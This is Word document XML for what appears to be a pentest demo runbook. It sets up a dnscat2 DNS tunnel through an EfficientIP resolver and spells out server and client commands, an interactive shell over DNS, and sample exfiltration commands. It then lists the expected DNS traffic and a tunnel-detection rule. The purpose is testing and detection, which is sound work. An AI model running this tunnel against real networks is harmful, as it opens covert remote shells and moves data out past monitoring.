          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prerequisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668DC6A6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Colleague's server must be used for this — Burp Collaborator cannot run a dnscat2 server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680ABB06" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>dnscat2 server installed on colleague's server (github.com/iagox86/dnscat2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB5C485" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dnscat2 client available on your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> workstation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E411F60" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435D5F7F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Setup — Server Sid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>e (Colleague)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702558C3" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:t>Install dnscat2 server on the colleague's machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63CB1192" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>git clone https://github.com/iagox86/dnscat2.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006DFB10" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cd dnscat2/server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645534E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gem install bundler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C999D8B"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bundle </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2C3DCA68" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598ABF09" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:t>Start the dnscat2 server, listening on the custom domain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACFB282" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ruby dnscat2.rb CUSTOM_DOMAIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFF0D4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Note the secret key displayed — you need this on the client side</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6D96C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148FC700" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Step-by-Step Setup — Client Side (Your Workstation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1F867" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:t>Install dnscat2 client:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14338A78" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>git clone https:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//github.com/iagox86/dnscat2.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1853EB99" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cd dnscat2/client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6682036D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>make</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CA6B4E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="048348BC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Connect through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EfficientIP's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> resolver:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8A0D05" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>dnscat</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dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> server=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>DNS_SRV,domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=CUSTOM_DOMAIN \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A223F8D"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--secret=&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>secret_from_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EECC9AE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0200A9" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:t>On the server, you now have an interactive session. Demonstrate data exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E0352E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># In the dnscat2 server console:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3464DAD6" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>session -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C1545" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238A8A8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AB1A26" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># You now have a shell over DNS. Show it to the audience:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6916EF2E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FE2AD93" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629AF87" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>/hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FA0B1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C046731" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">What to Expect from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EfficientIP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3FF781D1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Sustained, periodic DNS queries to CUSTOM_DOMAIN (every few seconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153BFF8D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Both queries AND responses carry encoded data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C788C8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>TXT record queries are common with dnscat2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D74237" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>Large DNS response sizes (abnormal for standard lookup</w:t>
      </w:r>
      <w:r>
        <w:t>s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B13FE7C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5090"/>
        </w:rPr>
        <w:t xml:space="preserve">•  </w:t>
      </w:r>
      <w:r>
        <w:t>This pattern is distinct from one-shot exfil — it is a persistent tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4916D854" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="005B2212">
      <w:pPr>
        <w:spacing w:before="100" w:after="100"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C75DCF8" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Detection Rules Required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B2212" w14:paraId="0E73BDE8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="20AAD064" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="54094BF1" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1B2A4A"/>
          </w:tcPr>
          <w:p w14:paraId="03B33E90" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="15B93C63" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="09492B7A" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E12a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="571591A7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS tunnel detection — sustained session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7181A58E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Same source + same base domain + continuous high-entropy queries for &gt;5 minutes → ALERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
